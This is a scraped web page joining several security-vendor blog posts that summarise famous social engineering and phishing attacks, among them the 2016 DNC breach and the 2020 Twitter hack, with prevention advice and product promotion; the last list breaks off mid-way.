social engineering case study examples

10 real and famous cases of social engineering attacks

Updated at June 21, 2021
Blog , Threat Research

Woman searching for famous social engineering attacks

Social engineering is the tactic behind some of the most famous hacker attacks. It’s a method based on research and persuasion that is usually at the root of spam , phishing , and spear phishing scams, which are spread by email.

The purpose of social engineering attacks is, basically, to gain the victim’s trust to steal data and money. Social engineering incidents often also involve the use of malware , such as ransomware and trojans .

The cases of social engineering listed below will give you an idea of how these attacks work and how costly they can be for companies, people, and governments. If you ever doubted that a mere fake Apple support email could do some real damage, this list is for you.

In this article, we’ll show you the following examples of social engineering:

Check out 10 social engineering attacks

1. shark tank, 2020.

Shark Tank television judge Barbara Corcoran was tricked in a nearly USD 400,000 phishing and social engineering scam in 2020. A cybercriminal impersonated her assistant and sent an email to the bookkeeper requesting a renewal payment related to real estate investments. He used an email address similar to the legitimate one. The fraud was only discovered after the bookkeeper sent an email to the assistant’s correct address asking about the transaction.

2. Toyota, 2019

Toyota Boshoku Corporation, an auto parts supplier, was the victim of a social engineering and BEC (Business Email Compromise) attack in 2019. The money lost amounts to USD 37 million. Using persuasion, attackers persuaded a finance executive to change recipient’s bank account information in a wire transfer.

3. Cabarrus County, 2018

Due to a social engineering and BEC scam, Cabarrus County, in the United States, suffered a loss of USD 1.7 million in 2018. Using malicious emails , hackers impersonated county suppliers and requested payments to a new bank account. According to the investigation, after the money was transferred, it was diverted to several accounts. In the emails, the scammers presented apparently legitimate documentation.

By the way, have you checked our list of 10 real and famous cases of BEC (Business Email Compromise) ?

4. Ethereum Classic, 2017

Several people lost thousands of dollars in cryptocurrency after the Ethereum Classic website was hacked, in 2017. Using social engineering , hackers impersonated the owner of Classic Ether Wallet, gained access to the domain registry, and then redirected the domain to their own server. Criminals extracted Ethereum cryptocurrency from the victims after entering a code on the website that allowed them to view private keys that are used for transactions.

5. Democratic Party, 2016

One of the most iconic cases of social engineering is the United States presidential election in 2016. Spear phishing attacks led to the leak of emails and information from the Democratic Party that may have influenced the result of the election, with Donald Trump’s victory over Hillary Clinton. Hackers created a fake email from Gmail, inviting users, through a link , to change their passwords due to unusual activity. Fraudsters then had access to hundreds of emails containing sensitive information about the Clinton campaign.

6. Ubiquiti Networks, 2015

Ubiquiti Networks, a manufacturer of technology for networking, lost almost $40 million dollars, in 2015, after a phishing attack. It’s believed that an employee email account was compromised in Hong Kong. Then, hackers used the technique of employee impersonation to request fraudulent payments, which were made by the accounting department.

Check our 7 tips on how to identify and detect malicious emails and be aware!

7. Sony Pictures, 2014

After an investigation, the FBI pointed out that the cyberattack on Sony Pictures, in 2014, was the responsibility of the North Korea government. Thousands of files, including business agreements, financial documents and employees’ information, were stolen. Sony Pictures was targeted by spear phishing attacks. It appears employees were lured by fake Apple emails.

8. Target, 2013

As a result of the Target data breach, in 2013, hackers gained access to 40 million customers’ payment information. Through a phishing email, criminals installed a malware on a Target partnering company, which allowed them, in a second moment, to access the network of the second-largest department store retailer in the United States. Hackers then installed another malware on Target’s system to copy customers’ credit and debit card information. What can we learn from this attack? Be very cautious with companies and partners that have access to your network.

9. South Carolina Department of Revenue, 2012

Hackers stole millions of Social Security numbers and thousands of credit and debit card information from the South Carolina Department Revenue, in 2012. Employees fell into phishing scams, sharing their usernames and passwords with criminals. After that, with credentials in hands, the hackers gained access to the state agency’s network.

10. RSA, 2011

It’s estimated that the RSA, a security company, has spent about $66 million because of its data breach, in 2011. The attack started with an Excel document, sent to a small group of employees via email. The email subject said something like “Recruitment Plan”. The attachment contained a malicious file which opened a backdoor for the hackers.

How to prevent social engineering incidents

As seen in the examples, social engineering is based on the fact that the attacker gains the victim’s trust. For this reason, it’s important to pay attention to emails, check attachments and links , and be suspicious of urgent orders that mainly involve money.

Technology is also in your favor. Gatefy provides different email protection solutions for companies. For example, we’ve a secure email gateway solution and an anti-fraud solution (based on DMARC) that will help your business to fight social engineering attacks, phishing, and other threats.

Get in touch or request a demo .

10 real and famous cases of BEC (Business Email Compromise)

Email delivered at a mail box passing by dmarc

8 reasons to use DMARC in your business

What is mail server?

Proofpoint closes acquisition of Tessian. Read More ->

Why Tessian

By Initiative
Email Defense in Depth -->
Stop Sensitive Data Loss -->
By Platform
Microsoft 365 -->
By Threat Type
Business Email Compromise -->
Vendor Email Compromise -->
Account Takeover -->
Image and QR Code Attack -->
Credential Theft -->
Financial Fraud -->
Misdirected Email -->
Data Exfiltration -->
Customer Stories -->
Reviews -->
By Industry
Finance -->
Healthcare -->
Technology -->

Advanced Email Protection for Florida’s Largest Law Firm

Webinars -->
Product Updates -->
Research & Reports -->
Product Datasheets -->
Case Studies -->

Forrester has named Tessian a Strong Performer in The Forrester Wave™: Enterprise Email Security, Q2 2023

About --> Learn more about Tessian's mission, values, and team
Careers --> Learn more about Tessian's career opportunities
Get a Platform Overview
Email Defense in Depth
Stop Sensitive Data Loss
Microsoft 365
Business Email Compromise
Vendor Email Compromise
Account Takeover
Image and QR Code Attack
Credential Theft
Financial Fraud
Misdirected Email
Data Exfiltration
Customer Stories
Product Updates
Research & Reports
Product Datasheets
Case Studies

15 Examples of Real Social Engineering Attacks

Social engineering attacks are one of the main ways bad actors can scam companies. Here’s 15 of the biggest attacks, and how they happened.

Social engineering attacks are a type of cybercrime wherein the attacker fools the target through impersonation. They might pretend to be your boss, your supplier, someone from our IT team, or your delivery company. Regardless of who they’re impersonating, their motivation is always the same — extracting money or data.

1. $100 Million Google and Facebook Spear Phishing Scam

The biggest social engineering attack of all time (as far as we know) was perpetrated by Lithuanian national, Evaldas Rimasauskas, against two of the world’s biggest companies: Google and Facebook. Rimasauskas and his team set up a fake company, pretending to be a computer manufacturer that worked with Google and Facebook. Rimsauskas also set up bank accounts in the company’s name.

The scammers then sent phishing emails to specific Google and Facebook employees, invoicing them for goods and services that the manufacturer had genuinely provided — but directing them to deposit money into their fraudulent accounts. Between 2013 and 2015, Rimasauskas and his associates cheated the two tech giants out of over $100 million.

2. Persuasive email phishing attack imitates US Department of Labor

In January 2022, Bleeping Computer described a sophisticated phishing attack designed to steal Office 365 credentials in which the attackers imitated the US Department of Labor (DoL). The scam is a noteworthy example of how convincing phishing attempts are becoming.

The attack used two methods to impersonate the DoL’s email address—spoofing the actual DoL email domain (reply@dol[.]gov) and buying up look-a-like domains, including “dol-gov[.]com” and “dol-gov[.]us”. Using these domains, the phishing emails sailed through the target organizations’ security gateways.

The emails used official DoL branding and were professionally written and invited recipients to bid on a government project. The supposed bidding instructions were included in a three-page PDF with a “Bid Now” button embedded.

On clicking the link, targets were redirected to a phishing site that looked identical to the actual DoL site, hosted at a URL such as bid-dolgov[.]us. The fake bidding site instructed users to enter their Office 365 credentials. The site even displayed an “error” message after the first input, ensuring the target would enter their credentials twice and thus reducing the possibility of mistyped credentials.

It’s easy to see how even a relatively scrupulous employee could fall for an attack like this—but the problem would not have arisen if the target organization had better email security measures in place.

3. Russian hacking group targets Ukraine with spear phishing

As world leaders debate the best response to the increasingly tense situation between Russia and Ukraine, Microsoft warned in February 2022 of a new spear phishing campaign by a Russian hacking group targeting Ukrainian government agencies and NGOs.

The group—known as Gamaredon and tracked by Microsoft as ACTINIUM—has allegedly been targeting “organizations critical to emergency response and ensuring the security of Ukrainian territory” since 2021.

The initial phase of Gamaredon’s attack relies on spear phishing emails containing malware. The emails also contain a tracking pixel that informs the cybercriminals whether it has been opened.

The case is an important reminder of how cybersecurity plays an increasingly central role in international conflicts—and how all organizations should be taking steps to improve their security posture and protect against social engineering attacks.

Phishing Campaigns Pick-Up in the Wake of the Ukraine Invasion

4. Deepfake Attack on UK Energy Company

In March 2019, the CEO of a UK energy provider received a phone call from someone who sounded exactly like his boss. The call was so convincing that the CEO ended up transferring $243,000 to a “Hungarian supplier” — a bank account that actually belonged to a scammer.

This “cyber-assisted” attack might sound like something from a sci-fi movie, but, according to Nina Schick, Author of “ Deep Fakes and the Infocalypse: What You Urgently Need to Know ”, “This is not an emerging threat. This threat is here. Now.”

To learn more about how hackers use AI to mimic speech patterns, watch Nina’s discussion about deepfakes with Elvis Chan, Supervisory Special Agent at the FBI.

What are Deepfakes? Are They a Security Threat?

5. $60 Million CEO Fraud Lands CEO In Court

Chinese plane parts manufacturer FACC lost nearly $60 million in a so-called “ CEO fraud scam ” where scammers impersonated high-level executives and tricked employees into transferring funds. After the incident, FACC then spent more money trying to sue its CEO and finance chief, alleging that they had failed to implement adequate internal security controls.

While the case failed, it’s an important reminder: cybersecurity is business-critical and everyone’s responsibility. In fact, Gartner predicts that by 2024, CEOs could be personally liable for breaches.

6. Microsoft 365 phishing scam steals user credentials

In April 2021, security researchers discovered a Business Email Compromise ( BEC ) scam that tricks the recipient into installing malicious code on their device. Here’s how the attack works, and it’s actually pretty clever.

The target receives a blank email with a subject line about a “price revision.” The email contains an attachment that looks like an Excel spreadsheet file (.xlsx). However, the “spreadsheet” is actually a .html file in disguise.

Upon opening the (disguised) .html file, the target is directed to a website containing malicious code. The code triggers a pop-up notification, telling the user they’ve been logged out of Microsoft 365, and inviting them to re-enter their login credentials.

You can guess what happens next—the fraudulent web form sends the user’s credentials off to the cybercriminals running the scam.

This type of phishing—which relies on human error combined with weak defenses—has thrived during the pandemic. Phishing rates doubled in 2020, according to the latest FBI data.

7. Singapore bank phishing saga like ‘fighting a war’

Customers of the Oversea-Chinese Banking Corporation (OCBC) were hit by a string of phishing attacks and malicious transactions in 2021, leading to around $8.5 million of losses across approximately 470 customers.

The bank’s CEO Helen Wong described her company’s battle against the phishing attacks and subsequent fraudulent transfers as like “fighting a war.”

OCBC customers were duped into giving up their account details after receiving phishing emails in December 2021. The situation escalated quickly despite the bank shutting down fraudulent domains and alerting customers of the scam.

Wong described how, once the phishing campaign had taken hold, the fraudsters had set up “mule” accounts to receive stolen funds. No matter how quickly the bank’s security team managed to shut down a mule account, the scammers would soon find another to take its place.

The CEO described her dilemma after getting the phishing campaign under control: reimbursing customers felt like the right thing to do, but Wong feared it could incentivize further attacks. So far over 200 customers have been compensated.

8. Ransomware gang hijacks victim’s email account

In April 2021, several employees of U.K. rail operator Merseyrail received an unusual email from their boss’s email account with the subject line “Lockbit Ransomware Attack and Data Theft.” Journalists from several newspapers and tech sites were also copied in.

The email—sent by a fraudster impersonating Merseyrail’s director—revealed that the company had been hacked and had tried to downplay the incident. The email also included an image of a Merseyrail employee’s personal data.

It’s not clear how Merseyrail’s email system got compromised (although security experts suspect a spear phishing attack)—but the “double extortion” involved makes this attack particularly brutal.

The “Lockbit” gang not only exfiltrated Merseyrail’s personal data and demanded a ransom to release it—the scammers used their access to the company’s systems to launch an embarrassing publicity campaign on behalf of its director.

How to Close Critical Data Loss Prevention (DLP) Gaps in Microsoft 365

9. Phishing scam uses HTML tables to evade traditional email security

Criminals are always looking for new ways to evade email security software. One BEC attack, discovered in April 2021, involves a particularly devious way of sneaking through traditional email security software like Secure Email Gateways (SEGs) and rule-based Data Loss Prevention (DLP).

BEC attacks often rely on impersonating official emails from respected companies. This means embedding the company’s logos and branding into the email as image files.

Some “rule-based” email security software automatically treats image files as suspicious. If a phishing email contains a .png file of the Microsoft Windows logo, the email is more likely to be detected—but without that distinctive branding, the email won’t look like it came from Microsoft.

But once again, cyber criminals have found a way to exploit the rule-based security approach.

To imitate Microsoft’s branding, this attack uses a table instead of an image file—simply a four-square grid, colored to look like the Windows logo. The average employee is unlikely to closely inspect the logo and will automatically trust the contents of the email.

This isn’t the first time fraudsters have used tables to evade rule-based DLP software. For example, some email security filters are set up to detect certain words, like “bitcoin.” One way around this is to create a borderless table and split the word across the columns: “bi | tc | oin.”

10. Sacramento phishing attack exposes health information

Five employees at Sacramento County revealed their login credentials to cybercriminals after receiving phishing emails on June 22, 2021.

The attack was discovered five months later , after an internal audit of workers’ email inboxes.

The breach occurred after employees received phishing emails containing a link to a malicious website. The targets entered their usernames and passwords into a fake login page which were then harvested by cybercriminals.

The attack resulted in a data breach exposing 2,096 records of health information and 816 records of “personal identification information.” The county notified the victims by email and offered free credit monitoring and identity theft services.

It remains to be seen whether this proposed resolution by the county will be enough. Protection of health information is particularly tightly regulated in the US, under the Health Insurance Portability and Accountability Act (HIPAA), and data breaches involving health data have led to some hefty lawsuits in the past.

Legacy Secure Email Gateways Are No Match for the Cyber Threats of Tomorrow

11. Google Drive collaboration scam

In late 2020, a novel but simple social engineering scam emerged that exploited Google Drive’s notification system.

The fraud begins with the creation of a document containing malicious links to a phishing site . The scammer then tags their target in a comment on the document, asking the person to collaborate.

Once tagged, the target receives a legitimate email notification from Google containing the comment’s text and a link to the relevant document.

If the scam works, the victim will view the document, read the comments, and feel flattered at they’re being asked to collaborate. Then, the victim will click one of the malicious links , visit the phishing site, and enter their login credentials or other personal data.

This scam is particularly clever because it exploits Google’s email notification system for added legitimacy. Such notifications come straight from Google and are unlikely to trigger a spam filter.

But like all social engineering attacks, the Google Drive collaboration scam plays on the victim’s emotions : in this case, the pride and generosity we might feel when called upon for help.

Want to see a screenshot of a similar attack? We breakdown a spear phishing attack in which the attacker impersonates Microsoft Teams. Check it out here .

12. Sharepoint phishing fraud targets home workers

April 2021 saw yet another phishing attack emerge that appears specifically designed to target remote workers using cloud-based software.

The attack begins when the target receives an email—written in the urgent tone favored by phishing scammers—requesting their signature on a document hosted in Microsoft Sharepoint.

The email looks legitimate. It includes the Sharepoint logo and branding familiar to many office workers. But the link leads to a phishing site designed to siphon off users’ credentials.

Phishing attacks increasingly aim to exploit remote collaboration software— Microsoft research suggests nearly half of IT professionals cited the need for new collaboration tools as a major security vulnerability during the shift to working from home.

The Ultimate Guide to Security for Remote Working

13. $75 Million Belgian Bank Whaling Attack

Perhaps the most successful social engineering attack of all time was conducted against Belgian bank, Crelan . While Crelan discovered its CEO had been “whaled” after conducting a routine internal audit, the perpetrators got away with $75 million and have never been brought to justice.

Crelan fell victim to “ whaling ” — a type of spear-phishing where the scammers target high-level executives. Cybercriminals frequently try to harpoon these big targets because they have easy access to funds.

14. High-Profile Twitters Users’ Accounts Compromised After Vishing Scam

In July 2020, Twitter lost control of 130 Twitter accounts , including those of some of the world’s most famous people — Barack Obama, Joe Biden, and Kanye West.

The hackers downloaded some users’ Twitter data, accessed DMs, and made Tweets requesting donations to a Bitcoin wallet. Within minutes — before Twitter could remove the tweets — the perpetrator had earned around $110,000 in Bitcoin across more than 320 transactions.

Twitter has described the incident as a “phone spear phishing” attack (also known as a “ vishing ” attack). The calls’ details remain unclear, but somehow Twitter employees were tricked into revealing account credentials that allowed access to the compromised accounts.

Following the hack, the FBI launched an investigation into Twitter’s security procedures. The scandal saw Twitter’s share price plummet by 7% in pre-market trading the following day.

15. Texas Attorney-General Warns of Delivery Company Smishing Scam

Nearly everyone gets the occasional text message that looks like it could be a potential scam. But in September 2020, one smishing (SMS phishing) attack became so widespread that the Texas Attorney-General put out a press release warning residents about it.

Victims of this scam received a fraudulent text message purporting to be from a delivery company such as DHL, UPS, or FedEx. The SMS invited the target to click a link and “claim ownership” of an undelivered package. After following the link, the target was asked to provide personal information and credit card details.

The Texas Attorney-General warned all Texans not to follow the link. He stated that delivery companies do not communicate with customers in this way, and urged anyone receiving the text message to report it to the Office of the Attorney General or the Federal Trade Commission.

Top tip: Never to respond to any suspicious message, click links within SMS messages, or reveal personal or company information via SMS.

Prevent social engineering attacks in your organization

There’s one common thread through all of these attacks: they’re really, really hard to spot. That’s where Tessian comes in. Tessian is i ntelligent cloud email security that stops threats and builds smart security cultures in the modern enterprise.

Powered by machine learning , Tessian analyzes and learns from an organization’s current and historical email data and protects employees against inbound email security threats, including whaling, CEO Fraud, BEC, spear phishing, and other targeted social engineering attacks.

To learn more about how Tessian can protect your people and data against social engineering attacks on email, book a demo today . Or, if you’d rather just stay up-to-date with the latest social engineering attacks, subscribe to our weekly blog digest. You’ll get news, threat intel, and insights from security leaders for security leaders straight to your inbox.

Attackers are Using Microsoft Forms to Exfiltrate Data

Why Financial Services Firms are Most Likely to Fall for Phishing Attacks

Phishing 101: What is Phishing?

Hacker’s Advice: 7 Tips for Avoiding Phishing Scams

Penetration Testing|The Ultimate Tool for Cyber Security Assessment
Internal Network Penetration Testing| Are You Protected Against Internal Security Threats?
Incident Response|Comprehensive Expert Help After a Security Incident
Computer Forensics|Arm Your Legal Team with Digital Evidence
Expert Witness Services|Build Your Case with Kevin's Expertise
Security Awareness Training|Your Comprehensive Security Training Library
Vulnerability Assessment|See Your System Through the Eyes of a Hacker
Product Claims Testing|Get Unbiased Proof From the Best in the Business
Red Team Operations|Evaluate Your Response to An Active Data Breach
Social Engineering Strength Testing|Safeguarding Your Security From Human Manipulation
The Art of Invisibility|The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data
Ghost in the Wires|My Adventures as the World's Most Wanted Hacker: A New York Times Bestseller
The Art of Intrusion|The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers
The Art of Deception|Controlling the Human Element of Security
About Kevin|Whether you call him famous or infamous, Kevin Mitnick is one of a kind.
Global Ghost Team|The Best of the Best In Cyber Security and Pentesting, Handpicked for Your Team
Our Clients|Our Legacy of Extraordinary Services for Extraordinary Clients
Testimonials & Reviews|Approved Quotes about Kevin's Live Hacking Appearances
Press Archives|The Latest Cybersecurity Articles & News About Kevin Mitnick & Mitnick Security
Media Kit|Bureau-Friendly Material For Your Website, E-mail and Print Needs
FAQs|Explore answers to commonly-asked questions from fans, clients, colleagues and everyone in between.
Blog|The latest news from Kevin Mitnick and the Global Ghost Team
Virtual Events|Unsurpassed Experience in Successful Online Events and Trainings
Lockpick Business Card|Learn More About the Card That Opens Doors Around the World
Submit a Proposal|Contact Kevin’s Team With Your Proposal or Business Opportunity
Join the Team|Do You Want to Work With Us?

5 Examples of Top Social Engineering Attacks

There’s something both humbling and terrifying about watching industry giants like Twitter and Uber fall victim to cyber attacks.

It's an important reflection for smaller-scale companies who’ve faced a breach of their own, graciously reminding them that even the big dogs fall for the bad guy— and a haunting reminder that even the most elite security defenses can be compromised.

In this round up, we’re taking a look at some of the top social engineering attacks in which small mistakes cost these businesses greatly. These attacks stand out for their severity and notoriety and we hope that these brand’s blunders may become valuable lessons for improving your company’s own cybersecurity.

5 Top Social Engineering Attacks

1. 2016 us presidential election email leak.

One of the top hacks of the decade was the Democratic campaign’s email leak, which caused mass hysteria.

Bad actors from Russia sent a series of spear phishing emails to various individuals in The Democratic National Convention’s network, posing as Google warning recipients of suspicious activity on their Google accounts. The social engineering email shortened the link using a Bitly URL, hiding its true redirect path.

Once the shortened link was clicked, the webpage asked recipients to change their password. After targets clicked the spoofed link and entered their credentials, the cyber criminals gained full access to their Google account, including their Gmail access, which allowed them to scrub thousands of emails with sensitive information pertaining to the Democratic candidate Hilary Clinton’s campaign.

Social Engineering Attack Lesson Learned

Even if you know to think before you click, be cautious of shortened URL links. Shortened URLs also cannot be blocked by a firewall, as the URL cannot be analyzed.

There are few circumstances where a reputable company will ever send you a shortened URL, so if you see a Bitly link, proceed with caution— it could be a malware trap.

2. 2020 Twitter Bitcoin Scam

The Twitter Bitcoin scam , proved that not even the social media giants are impervious to cyber breaches.

Prominent Twitter users with the trusted blue verification check mark Tweeted “double your Bitcoin” offers, telling their followers that they would double donations made on a select link. Well-respected leaders, celebrities, and big brands like former U.S. President Barack Obama, media billionaire Mike Bloomberg, tech creators Apple, and more were among the Twitter accounts affected. Because the accounts targeted had millions of followers, the bad actors received hundreds of contributions within mere minutes— reportedly totaling over $100K in Bitcoin, according to The BBC.

This account takeover was done through a series of highly-targeted social engineering attacks . Bad actors manipulated Twitter employees to infect them with malware. From there, they made their way through Twitter’s internal systems and gained administrative access to a wealth of verified users’ passwords.

Twitter employees were the company’s biggest weakness, falling for social engineering exploits that allowed the bad actors a backdoor into highly-sensitive login information. It’s important to learn more about how social engineers trick employees and educate your team on social engineering red flags .

3. 2022 Attack on Uber

A threat actor used Uber’s Internal Slack Platform to impersonate an employee and gain internal network access. They posted an explicit image and it’s believed that they escalated privileges and viewed sensitive information. This threat actor admitted their conquest and said they used social engineering to easily penetrate Uber’s security protocols.

The threat actor — who goes by the name TeaPot — was only eighteen, but he managed to fool an employee into providing their login credentials. The lesson learned here is that no application or platform should be taken for granted as an access point. Organizations should consider multi-factor authentication (MFA) for their internal platforms and applications.

4. 2022 Attack on Rockstar Games

The social engineering attack on Rockstar Games was similar to what happened to Uber, and it happened just a few days after Uber’s fiasco by the same threat actor. Once inside the internal Slack channel of Rockstar Games, TeaPot claimed he was able to access code for the then unannounced sequel to the game, Grand Theft Auto.

Given the circumstances, the lesson learned here is that threat actors may not stop once they breach the defenses of their original target. In fact, one successful social engineering attack may encourage the threat actor to try for another company using the same techniques that worked in the original attack.

5. 2022 Attack on Twilio

The threat actor gained access to private customer and employee account information by stealing an employee password. This was done through a broad-based social engineering attack that involved sending fake IT text messages to Twilio employees.

The social engineering attack on Twilio appears to have been a targeted phishing attack . The lesson learned is that email messages are not the only way employees can encounter phishing attacks. Phishing can occur through social media platforms, text messengers, and other forms of digital communication.

Don’t Become a Victim of a Social Engineering Attack

These major companies fell prey to social engineering attacks despite thinking that their security standards were enough. The fact that three of the top social engineering attacks listed occurred in 2022 shows that threat actors are increasing their efforts. Use the lessons learned to strengthen your security defenses, with the right help.

Mitnick Security is here to demystify what it means to mitigate your risks— in just 5-½ easy steps. Our free guide breaks down a few of the most important improvements you can make, helping to dramatically improve your security posture.

Download the “ 5 ½ Easy Steps to Avoid Cyber Threats ” ebook to start your security hardening journey.

Topics: Social Engineering

Latest Posts

Kevin offers three excellent presentations, two are based on his best-selling books. His presentations are akin to technology magic shows that educate and inform while keeping people on the edge of their seats. He offers expert commentary on issues related to information security and increases “security awareness.”

Celebrating National Social Engineering Day

August 6th, 2024, marks the first annual National Social Engineering Day, an opportunity to raise awareness about social engineering threats and empha..

The Growth of Third-Party Software Supply Chain Cyber Attacks

When testing your employees' social engineering readiness, your teams need simulated attacks that feel as if they’re coming from a nefarious engineer...

Bypassing Key Card Access: Shoring Up Your Physical Security

As you build additional layers of defense into your cybersecurity framework, it's important to implement physical security strategies as well.

Data Center as a Service Overview
Hardware as a Service Flexible Hardware Leasing
Bare Metal Cloud API-Driven Dedicated Servers
Object Storage S3 API Compatible Storage Service
Meet-Me Room Overview
AWS Direct Connect Dedicated Link to Amazon Cloud
Google Cloud Interconnect Private Connectivity to Google Cloud
Megaport Cloud Router Simplified Multi-Cloud Connections
All Carriers Global Interconnectivity Options
Data Center Locations Overivew
Phoenix, AZ The Largest Fiber Backbone in the U.S.
Ashburn, VA The Largest Fiber Backbone in the U.S.
Atlanta, GA A Top Market for Bandwidth Access
Amsterdam, NL The Connectivity Hub of Europe
Belgrade, RS Strategic PoP in the Southeast Europe
Singapore, SG Most Neutral Business-Friendly Climate
Platform Overview
Instance Pricing See All Configurations
Infrastructure As Code DevOps Integrations
BMC vs. Dedicated Servers Choose the Best Option
Supermicro Servers Industry-Leading Hardware
Rancher Deployment One-Click Kubernetes Deployment
Intel Xeon E-2300 Entry-Level Servers
3rd Gen Intel Xeon Scalable CPUs Boost Data-Intensive Workloads
Ecosystem Underlying Technologies
Object Storage S3-Compatible Storage Solution
Dedicated Servers Overview
FlexServers Vertical CPU Scaling
Intel Xeon-E Servers Intel Xeon 2200 Microarchitecture
GPU Servers Servers with NVIDIA Tesla GPUs
Dedicated Servers vs. BMC Compare Popular Platforms

15 Examples of Social Engineering Attacks

Home / Security Strategy / 15 Examples of Social Engineering Attacks

Social engineering exploits the weakest link in any system: human error. It involves manipulating human psychology and behavior to deceive people into divulging sensitive information or granting unauthorized access to networks, systems, and physical locations.

Social engineering relies on exploiting powerful and near-universal emotions such as greed or fear instead of relying on technical hacking. It has even become the preferred tactic among hackers and its impact on cybersecurity cannot be overstated.

This article lists the 15 most famous cyber attacks where social engineering was the predominant factor. By understanding the hackers' tactics, you will be able to identify and thwart social engineering attacks on you and your organization.

Social Engineering Examples

Let's look at some of the most infamous social engineering cyber attacks in history.

1. Kevin Mitnick's Early Career

In 1994, Kevin Mitnick successfully posed as an employee and convinced Motorola, Novell, Nokia, and Sun Microsystems technical support staff that he urgently needed access to certain information for troubleshooting. Through a combination of charm, technical jargon, and urgency, he persuaded the support staff to provide him with the information he needed.

Armed with sensitive technical details, Mitnick gained unauthorized access to internal systems and exploited the vulnerabilities he had learned about. He was caught, but after his release from prison in 2000, Mitnick said he considered his actions "simple crimes of trespass." He further explained that his motivation was only to learn how phone networks operated.

Later in life, Kevin Mitnick, who passed away in July 2023 , used his talents for ethical hacking , becoming a respected security consultant and author.

2. Spear Phishing Attack on the Democratic National Committee

During the 2016 U.S. presidential campaign, a cyber attack targeted high-ranking officials and employees within the Democratic National Committee (DNC), the governing body of the Democratic Party in the United States.

The attackers crafted personalized and convincing phishing emails, a technique called spear phishing . Once a target clicked on malicious links or downloaded malware-infected attachments, they inadvertently provided their login credentials or allowed malware access to their system. The attackers gained unauthorized access to sensitive information within the DNC.

This breach eventually led to the release of confidential emails during the 2016 U.S. Presidential election campaign, which had significant political repercussions and triggered concerns about foreign interference. Investigations conducted by multiple cybersecurity firms blamed two notorious Russian hacking groups "Fancy Bear" and "Cozy Bear" for the breach.

The DNC contacted cybersecurity firm CrowdStrike for coordinated remediation and disaster recovery services. Concerningly, their report said that the two Russian state-sponsored hacking groups had infiltrated the DNC's network as early as 2015.

3. Bangladesh Bank Heist

Contrary to the belief that bank robberies only happen in Western films, the Bangladesh Bank Heist was one of the most audacious and successful in history.

In February 2016, hackers targeted the central bank of Bangladesh. With help from insiders, they sent spear phishing emails containing malware-infected attachments. When their targets eventually opened these attachments, they granted the hackers access to the bank's network and systems.

Once inside, the attackers used internal processes and controls to manipulate the bank's SWIFT (Society for Worldwide Interbank Financial Telecommunication) system, a messaging network used by financial institutions to send and receive payments securely .

Using fraudulent SWIFT transactions, the hackers attempted to transfer nearly $1 billion from the Bangladesh Bank to their accounts in the Philippines. Although some of the transactions were blocked or reversed, the hackers were able to transfer approximately $81 million .

Law enforcement agencies are still working to catch all the perpetrators of the Bangladesh Bank robbery.

Research by Deloitte suggests 91% of all cyber-attacks begin with a phishing email .

4. Sony Pictures Hack

In 2014, a group known as "Guardians of Peace" (GOP) targeted Sony Pictures Entertainment with spear phishing emails masquerading as official communications from trusted sources. GOP tricked Sony employees into disclosing their login credentials or clicking on malicious links that granted access to the company's systems.

Once inside, the hackers remained undetected for at least two months, during which they installed a listening implant, backdoor , proxy, destructive hard drive tool, and a cleaning tool to remove traces of the attack. Subsequently, they exfiltrated vast amounts of sensitive data, including unreleased movies, confidential business documents, employee records, and private email conversations.

One of the most significant aspects of the data breach was the theft of several films, including Annie , Fury , and The Interview . The movies were leaked online before their official release dates, causing immense financial damage to the film studio as copies were spread across the internet.

The leaked emails were also particularly damaging, as they exposed unfiltered conversations between executives and other industry figures. Some of the emails contained candid opinions about celebrities, actors, and business partners.

While the identity of the individuals behind GOP remains uncertain, the United States government pointed to North Korea as the likely culprit . The attack was allegedly motivated by the release of the film The Interview , a comedy centered around a fictional plot to assassinate North Korean leader Kim Jong-un.

5. Twitter Bitcoin Scam

In July 2020, hackers targeted several high-profile Twitter accounts, including those of Elon Musk, Barack Obama, Joe Biden, Kanye West, Bill Gates, and many others .

The attackers began by scraping LinkedIn to identify Twitter employees with administrator privileges. Using paid tools available to job recruiters, they accessed these employees' private contact information, including cell phone numbers.

Having selected their targets, they initiated contact by impersonating Twitter employees. The attack vector was connected to the company's remote work policy during the COVID-19 pandemic. The hackers managed to access the Twitter employees' Slack communications channel, where crucial information and authorization procedures for accessing the company's servers were pinned.

Once they breached the network, the attackers posted fraudulent tweets that deceived followers into believing that if they sent a specific amount of Bitcoin to a designated address, they would receive double in return.

The tweets were carefully crafted to appear authentic, capitalizing on the trust and authority of the targeted individuals. Many fell victim to the scam and sent their Bitcoin to the specified addresses, cumulatively losing hundreds of thousands of dollars.

6. NotPetya

Ransomware is a program designed to extort money, and ranges from basic lock screens to intricate code with encryption and data exfiltration capabilities.

Emerging in 2016, Petya is a ransomware strain that diverged from tradition by targeting the Master Boot Record (MBR) or the hard drive's partition table, rendering the entire system inoperable. Initially, Petya distributed its payload disguised as a PDF file, spreading through email attachments using various infection vectors like spear phishing emails and compromised websites.

On June 27, 2017, a major global cyber-attack utilized a new variant of Petya. Kaspersky reported attacks on more than 80 companies, with 80% of all infections happening in Ukraine, while Germany was the second hardest-hit country with about 9%. The U.S. government estimates that the total damage caused by this attack exceeds $10 billion .

Experts believed this was a politically motivated and state-sponsored attack against Ukraine, as it primarily targeted the National Bank of Ukraine and coincided with the eve of the Ukrainian Constitution Day holiday.

7. Target Data Breach

The Target data breach was one of the most significant in history, leading to over 40 million compromised credit card numbers, addresses, and phone numbers. In the aftermath, Target was forced to pay a $18.5 million settlement to the victims of the breach.

The attackers breached Target's network by compromising a third-party vendor, a refrigeration contractor called Fazio Mechanical. This type of attack is called a supply chain attack, and it focuses on exploiting the weakest link within a supply chain.

In 2022, the frequency of supply chain attacks exceeded that of malware-based attacks by 40% .

The Target hackers used phishing emails to install Citadel, a variant of the Zeus trojan, onto Fazio's computers. Using the breached vendor as a staging point, the hackers exploited an undiscovered vulnerability to gain a point of presence, escalate privileges, and attack Target's internal systems.

At the time of the breach, all major versions of enterprise-grade anti-malware were capable of successfully detecting Citadel. However, Fazio most likely relied on a free anti-malware solution that lacked real-time protection .

8. Anthem Data Breach

The Anthem data breach of 2015 was one of the most expensive and impactful phishing attacks in history.

Targeting one of the largest health insurers in the United States, the Anthem breach is the most extensive healthcare data breach ever recorded, giving the attackers access to the personal and medical information of nearly 79 million people. The stolen data included names, dates of birth, Social Security numbers, medical IDs, and other sensitive information, which were likely sold on the dark web .

